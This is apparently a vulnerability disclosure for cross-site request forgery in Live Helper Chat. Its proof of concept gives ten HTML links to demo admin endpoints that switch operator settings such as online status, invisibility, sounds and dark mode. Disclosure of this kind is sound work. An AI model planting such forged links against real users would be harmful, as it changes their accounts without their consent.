Description

CSRF in switching between enable and disable of the following:

- Dark/bright  
- Auto uppercase sentences  
- Do not scroll to the bottom on chat open  
- Auto preload previous visitor chat messages  
- Load previous message on scroll  
- New messages  
- New chats  
- Online  
- Based on activity  
- Visible  

Proof of Concept

<a href="https://demo.livehelperchat.com/site_admin/front/switchdashboard/(action)/mode">CLICK ME!</a>

<a href="https://demo.livehelperchat.com/site_admin/user/setsetting/auto_uppercase/0">CLICK ME!</a>

<a href="https://demo.livehelperchat.com/site_admin/user/setsetting/no_scroll_bottom/1">CLICK ME!</a>

<a href="https://demo.livehelperchat.com/site_admin/user/setsetting/auto_preload/1">CLICK ME!</a>

<a href="https://demo.livehelperchat.com/site_admin/user/setsetting/scroll_load/1">CLICK ME!</a>

<a href="https://demo.livehelperchat.com/site_admin/user/setsettingajax/chat_message/0">CLICK ME!</a>

<a href="https://demo.livehelperchat.com/site_admin/user/setsettingajax/new_chat_sound/0">CLICK ME!</a>

<a href="https://demo.livehelperchat.com/site_admin/user/setoffline/true">CLICK ME!</a>

<a href="https://demo.livehelperchat.com/site_admin/user/setalwaysonline/true">CLICK ME!</a>

<a href="https://demo.livehelperchat.com/site_admin/user/setinvisible/true">CLICK ME!</a>

Impact

This vulnerability is capable of tricking users to enable/disable personal settings on their accounts.